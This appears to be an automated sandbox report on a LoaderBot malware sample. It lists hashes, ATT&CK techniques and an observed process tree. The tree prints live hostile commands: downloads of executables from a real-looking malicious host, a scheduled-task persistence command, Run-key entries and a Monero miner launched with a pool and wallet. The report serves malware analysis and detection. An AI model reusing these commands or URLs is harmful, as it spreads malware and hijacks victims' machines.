loaderbot | c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e

Analysis

max time kernel
152s
max time network
153s
platform
windows10_x64
resource
win10-en-20211208
submitted
09/01/2022, 23:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe
Size

349KB
MD5

bdb742be28cdd944d6d76e7f848f5a8d
SHA1

81ed39584d00f6983f6332d0404bb8e8c0d7ea4b
SHA256

c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e
SHA512

e96c9e5fe7cf463ee29f49cd3ab24b5fc0eff8390f745f7e701451b72e0487d319c7c6ec636823cabc29b677406ed9b2445c7c4a8ffe2bfb9409b0bee3307bdf

Score

10^/10

loaderbot discovery loader miner persistence spyware stealer upx

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/memory/3996-156-0x0000000000210000-0x000000000066B000-memory.dmp	loaderbot
behavioral1/memory/3996-160-0x0000000000210000-0x000000000066B000-memory.dmp	loaderbot
behavioral1/memory/3996-161-0x0000000000210000-0x000000000066B000-memory.dmp	loaderbot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	760	WScript.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
4112	extd.exe
4080	extd.exe
1912	setup1.exe
4244	extd.exe
4412	setup2.exe
4424	extd.exe
3996	setup3.exe
2492	extd.exe
4836	update.exe
1984	1427_1641742560_826.exe
4844	6592_1641742763_483.exe
664	Driver.exe
1076	Driver.exe
4164	services32.exe
4036	sihost32.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001ab2f-119.dat	upx
behavioral1/files/0x000500000001ab2f-118.dat	upx
behavioral1/files/0x000500000001ab2f-124.dat	upx
behavioral1/files/0x000500000001ab2f-129.dat	upx
behavioral1/files/0x000500000001ab2f-139.dat	upx
behavioral1/files/0x000500000001ab2f-164.dat	upx

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	setup3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	setup2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe"	setup3.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4412	setup2.exe
3996	setup3.exe
1984	1427_1641742560_826.exe
1984	1427_1641742560_826.exe
1984	1427_1641742560_826.exe
4164	services32.exe
4164	services32.exe
4164	services32.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1912 set thread context of 792	1912	setup1.exe	80

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3148	4836	WerFault.exe	82
4504	1076	WerFault.exe	90

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2080	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings	cmd.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4412	setup2.exe
4412	setup2.exe
3996	setup3.exe
3996	setup3.exe
792	RegAsm.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3148	WerFault.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
4504	WerFault.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe
3996	setup3.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	4412	setup2.exe
Token: SeDebugPrivilege	3996	setup3.exe
Token: SeDebugPrivilege	792	RegAsm.exe
Token: SeDebugPrivilege	4836	update.exe
Token: SeRestorePrivilege	3148	WerFault.exe
Token: SeBackupPrivilege	3148	WerFault.exe
Token: SeDebugPrivilege	3148	WerFault.exe
Token: SeDebugPrivilege	4844	6592_1641742763_483.exe
Token: SeLockMemoryPrivilege	664	Driver.exe
Token: SeLockMemoryPrivilege	664	Driver.exe
Token: SeDebugPrivilege	4504	WerFault.exe
Token: SeDebugPrivilege	2452	conhost.exe
Token: SeDebugPrivilege	1844	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 3720	1628	c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe	69
PID 1628 wrote to memory of 3720	1628	c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe	69
PID 3720 wrote to memory of 4112	3720	cmd.exe	70
PID 3720 wrote to memory of 4112	3720	cmd.exe	70
PID 3720 wrote to memory of 4112	3720	cmd.exe	70
PID 3720 wrote to memory of 760	3720	cmd.exe	71
PID 3720 wrote to memory of 760	3720	cmd.exe	71
PID 3720 wrote to memory of 4080	3720	cmd.exe	72
PID 3720 wrote to memory of 4080	3720	cmd.exe	72
PID 3720 wrote to memory of 4080	3720	cmd.exe	72
PID 3720 wrote to memory of 1912	3720	cmd.exe	74
PID 3720 wrote to memory of 1912	3720	cmd.exe	74
PID 3720 wrote to memory of 1912	3720	cmd.exe	74
PID 3720 wrote to memory of 4244	3720	cmd.exe	75
PID 3720 wrote to memory of 4244	3720	cmd.exe	75
PID 3720 wrote to memory of 4244	3720	cmd.exe	75
PID 3720 wrote to memory of 4412	3720	cmd.exe	76
PID 3720 wrote to memory of 4412	3720	cmd.exe	76
PID 3720 wrote to memory of 4412	3720	cmd.exe	76
PID 3720 wrote to memory of 4424	3720	cmd.exe	77
PID 3720 wrote to memory of 4424	3720	cmd.exe	77
PID 3720 wrote to memory of 4424	3720	cmd.exe	77
PID 3720 wrote to memory of 3996	3720	cmd.exe	78
PID 3720 wrote to memory of 3996	3720	cmd.exe	78
PID 3720 wrote to memory of 3996	3720	cmd.exe	78
PID 3720 wrote to memory of 2492	3720	cmd.exe	79
PID 3720 wrote to memory of 2492	3720	cmd.exe	79
PID 3720 wrote to memory of 2492	3720	cmd.exe	79
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 1912 wrote to memory of 792	1912	setup1.exe	80
PID 792 wrote to memory of 4836	792	RegAsm.exe	82
PID 792 wrote to memory of 4836	792	RegAsm.exe	82
PID 792 wrote to memory of 4836	792	RegAsm.exe	82
PID 4836 wrote to memory of 1984	4836	update.exe	83
PID 4836 wrote to memory of 1984	4836	update.exe	83
PID 4836 wrote to memory of 4844	4836	update.exe	84
PID 4836 wrote to memory of 4844	4836	update.exe	84
PID 4836 wrote to memory of 4844	4836	update.exe	84
PID 3996 wrote to memory of 664	3996	setup3.exe	88
PID 3996 wrote to memory of 664	3996	setup3.exe	88
PID 3996 wrote to memory of 1076	3996	setup3.exe	90
PID 3996 wrote to memory of 1076	3996	setup3.exe	90
PID 1984 wrote to memory of 2452	1984	1427_1641742560_826.exe	93
PID 1984 wrote to memory of 2452	1984	1427_1641742560_826.exe	93
PID 1984 wrote to memory of 2452	1984	1427_1641742560_826.exe	93
PID 2452 wrote to memory of 1992	2452	conhost.exe	94
PID 2452 wrote to memory of 1992	2452	conhost.exe	94
PID 1992 wrote to memory of 2080	1992	cmd.exe	96
PID 1992 wrote to memory of 2080	1992	cmd.exe	96
PID 2452 wrote to memory of 2236	2452	conhost.exe	97
PID 2452 wrote to memory of 2236	2452	conhost.exe	97
PID 2236 wrote to memory of 4164	2236	cmd.exe	99
PID 2236 wrote to memory of 4164	2236	cmd.exe	99
PID 4164 wrote to memory of 1844	4164	services32.exe	100
PID 4164 wrote to memory of 1844	4164	services32.exe	100
PID 4164 wrote to memory of 1844	4164	services32.exe	100
PID 1844 wrote to memory of 4036	1844	conhost.exe	101
PID 1844 wrote to memory of 4036	1844	conhost.exe	101

C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe
"C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\A7AD.bat C:\Users\Admin\AppData\Local\Temp\c39b6247c3d38b4e06f05db01e440bd72cc99b2c000c2d082b22b87a64e2cc8e.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3720
- - C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4112
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29442\123.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/SIrrWmclYBgYamm.exe" "setup1.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4080
- - C:\Users\Admin\AppData\Local\Temp\29442\setup1.exe
    setup1.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:792
    - - C:\Users\Admin\AppData\Local\Temp\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\update.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4836
      - C:\ProgramData\1427_1641742560_826.exe
        
        "C:\ProgramData\1427_1641742560_826.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:1984
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\ProgramData\1427_1641742560_826.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2452
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1992
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"
        9⤵
        Creates scheduled task(s)
        
        PID:2080
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services32.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2236
        
        C:\Users\Admin\AppData\Roaming\services32.exe
        
        C:\Users\Admin\AppData\Roaming\services32.exe
        9⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:4164
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services32.exe"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1844
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        11⤵
        Executes dropped EXE
        
        PID:4036
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        12⤵
        
        PID:588
      - C:\ProgramData\6592_1641742763_483.exe
        
        "C:\ProgramData\6592_1641742763_483.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1736
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3148
- - C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/c_setup.exe" "setup2.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4244
- - C:\Users\Admin\AppData\Local\Temp\29442\setup2.exe
    setup2.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4412
- - C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/RMR.exe" "setup3.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4424
- - C:\Users\Admin\AppData\Local\Temp\29442\setup3.exe
    setup3.exe
    3⤵
    - Executes dropped EXE
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1076
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1076 -s 436
        5⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504
- - C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A79B.tmp\A7AC.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/588-322-0x0000021C418F6000-0x0000021C418F7000-memory.dmp

Filesize
4KB

Download
memory/588-316-0x0000021C41660000-0x0000021C41666000-memory.dmp

Filesize
24KB

Download
memory/588-320-0x0000021C418F0000-0x0000021C418F2000-memory.dmp

Filesize
8KB

Download
memory/588-319-0x0000021C3FC00000-0x0000021C3FC06000-memory.dmp

Filesize
24KB

Download
memory/588-315-0x0000021C41660000-0x0000021C41666000-memory.dmp

Filesize
24KB

Download
memory/588-321-0x0000021C418F3000-0x0000021C418F5000-memory.dmp

Filesize
8KB

Download
memory/664-238-0x00000000001B0000-0x00000000001C4000-memory.dmp

Filesize
80KB

Download
memory/792-186-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/792-181-0x00000000048E0000-0x000000000492B000-memory.dmp

Filesize
300KB

Download
memory/792-188-0x0000000007680000-0x0000000007BAC000-memory.dmp

Filesize
5.2MB

Download
memory/792-189-0x0000000006250000-0x00000000062A0000-memory.dmp

Filesize
320KB

Download
memory/792-172-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/792-185-0x0000000004D30000-0x0000000004D4E000-memory.dmp

Filesize
120KB

Download
memory/792-184-0x0000000004D50000-0x0000000004DE2000-memory.dmp

Filesize
584KB

Download
memory/792-183-0x0000000004C30000-0x0000000004CA6000-memory.dmp

Filesize
472KB

Download
memory/792-182-0x0000000005900000-0x0000000005DFE000-memory.dmp

Filesize
5.0MB

Download
memory/792-187-0x0000000006F80000-0x0000000007142000-memory.dmp

Filesize
1.8MB

Download
memory/792-179-0x00000000047E0000-0x0000000004DE6000-memory.dmp

Filesize
6.0MB

Download
memory/792-180-0x00000000048A0000-0x00000000048DE000-memory.dmp

Filesize
248KB

Download
memory/792-178-0x0000000004970000-0x0000000004A7A000-memory.dmp

Filesize
1.0MB

Download
memory/792-177-0x0000000004840000-0x0000000004852000-memory.dmp

Filesize
72KB

Download
memory/792-176-0x0000000004DF0000-0x00000000053F6000-memory.dmp

Filesize
6.0MB

Download
memory/792-175-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/792-174-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1844-300-0x000002347DFA3000-0x000002347DFA5000-memory.dmp

Filesize
8KB

Download
memory/1844-295-0x000002347E1B0000-0x000002347E3A2000-memory.dmp

Filesize
1.9MB

Download
memory/1844-301-0x000002347DFA6000-0x000002347DFA7000-memory.dmp

Filesize
4KB

Download
memory/1844-298-0x000002347DFA0000-0x000002347DFA2000-memory.dmp

Filesize
8KB

Download
memory/1844-299-0x00000234654F0000-0x0000023465502000-memory.dmp

Filesize
72KB

Download
memory/1844-296-0x000002347E1B0000-0x000002347E3A2000-memory.dmp

Filesize
1.9MB

Download
memory/1912-133-0x0000000004C00000-0x0000000004C92000-memory.dmp

Filesize
584KB

Download
memory/1912-151-0x00000000050E0000-0x00000000050EA000-memory.dmp

Filesize
40KB

Download
memory/1912-130-0x00000000001A0000-0x000000000029E000-memory.dmp

Filesize
1016KB

Download
memory/1912-131-0x00000000001A0000-0x000000000029E000-memory.dmp

Filesize
1016KB

Download
memory/1912-132-0x0000000005100000-0x00000000055FE000-memory.dmp

Filesize
5.0MB

Download
memory/1912-134-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

Filesize
4KB

Download
memory/1912-140-0x0000000004F20000-0x0000000004F96000-memory.dmp

Filesize
472KB

Download
memory/1912-144-0x0000000004EF0000-0x0000000004F0E000-memory.dmp

Filesize
120KB

Download
memory/1984-223-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-209-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-232-0x0000000000400000-0x0000000001443000-memory.dmp

Filesize
16.3MB

Download
memory/1984-231-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-230-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-229-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-228-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-227-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-219-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-226-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-224-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-199-0x00007FF5FFAF0000-0x00007FF5FFEC1000-memory.dmp

Filesize
3.8MB

Download
memory/1984-200-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-201-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-202-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-225-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-204-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-205-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-221-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-214-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-208-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-210-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-216-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-211-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-212-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-213-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-215-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/1984-207-0x00007FF875830000-0x00007FF875840000-memory.dmp

Filesize
64KB

Download
memory/2452-249-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-250-0x0000020004A40000-0x0000020004C31000-memory.dmp

Filesize
1.9MB

Download
memory/2452-259-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-243-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-255-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-253-0x000002001F0A0000-0x000002001F0B2000-memory.dmp

Filesize
72KB

Download
memory/2452-248-0x000002001F340000-0x000002001F532000-memory.dmp

Filesize
1.9MB

Download
memory/2452-244-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-245-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-246-0x0000020004EB0000-0x0000020004EB2000-memory.dmp

Filesize
8KB

Download
memory/2452-252-0x000002001F133000-0x000002001F135000-memory.dmp

Filesize
8KB

Download
memory/2452-251-0x000002001F130000-0x000002001F132000-memory.dmp

Filesize
8KB

Download
memory/2452-247-0x000002001F340000-0x000002001F532000-memory.dmp

Filesize
1.9MB

Download
memory/2452-254-0x000002001F136000-0x000002001F137000-memory.dmp

Filesize
4KB

Download
memory/3996-156-0x0000000000210000-0x000000000066B000-memory.dmp

Filesize
4.4MB

Download
memory/3996-160-0x0000000000210000-0x000000000066B000-memory.dmp

Filesize
4.4MB

Download
memory/3996-166-0x00000000012E0000-0x000000000142A000-memory.dmp

Filesize
1.3MB

Download
memory/3996-163-0x00000000716E0000-0x0000000071760000-memory.dmp

Filesize
512KB

Download
memory/3996-239-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

Filesize
4KB

Download
memory/3996-167-0x0000000075430000-0x0000000076778000-memory.dmp

Filesize
19.3MB

Download
memory/3996-161-0x0000000000210000-0x000000000066B000-memory.dmp

Filesize
4.4MB

Download
memory/3996-234-0x0000000005EA0000-0x0000000005F06000-memory.dmp

Filesize
408KB

Download
memory/3996-157-0x0000000001370000-0x0000000001371000-memory.dmp

Filesize
4KB

Download
memory/3996-158-0x0000000073BF0000-0x0000000073DB2000-memory.dmp

Filesize
1.8MB

Download
memory/3996-165-0x0000000074020000-0x00000000745A4000-memory.dmp

Filesize
5.5MB

Download
memory/3996-159-0x0000000074DD0000-0x0000000074EC1000-memory.dmp

Filesize
964KB

Download
memory/4412-146-0x00000000003E0000-0x0000000000442000-memory.dmp

Filesize
392KB

Download
memory/4412-152-0x0000000075430000-0x0000000076778000-memory.dmp

Filesize
19.3MB

Download
memory/4412-168-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/4412-169-0x0000000005D30000-0x000000000622E000-memory.dmp

Filesize
5.0MB

Download
memory/4412-170-0x0000000005930000-0x00000000059C2000-memory.dmp

Filesize
584KB

Download
memory/4412-171-0x0000000005910000-0x000000000591A000-memory.dmp

Filesize
40KB

Download
memory/4412-143-0x0000000073BF0000-0x0000000073DB2000-memory.dmp

Filesize
1.8MB

Download
memory/4412-145-0x0000000074DD0000-0x0000000074EC1000-memory.dmp

Filesize
964KB

Download
memory/4412-141-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/4412-150-0x0000000074020000-0x00000000745A4000-memory.dmp

Filesize
5.5MB

Download
memory/4412-147-0x00000000024D0000-0x0000000002515000-memory.dmp

Filesize
276KB

Download
memory/4412-148-0x00000000003E0000-0x0000000000442000-memory.dmp

Filesize
392KB

Download
memory/4412-142-0x00000000003E0000-0x0000000000442000-memory.dmp

Filesize
392KB

Download
memory/4412-149-0x00000000716E0000-0x0000000071760000-memory.dmp

Filesize
512KB

Download
memory/4836-193-0x00000000005E0000-0x00000000005E8000-memory.dmp

Filesize
32KB

Download
memory/4836-195-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/4836-194-0x00000000005E0000-0x00000000005E8000-memory.dmp

Filesize
32KB

Download
memory/4844-218-0x0000000000B60000-0x0000000000B68000-memory.dmp

Filesize
32KB

Download
memory/4844-220-0x0000000000B60000-0x0000000000B68000-memory.dmp

Filesize
32KB

Download
memory/4844-222-0x0000000005370000-0x00000000053D6000-memory.dmp

Filesize
408KB

Download
memory/4844-233-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download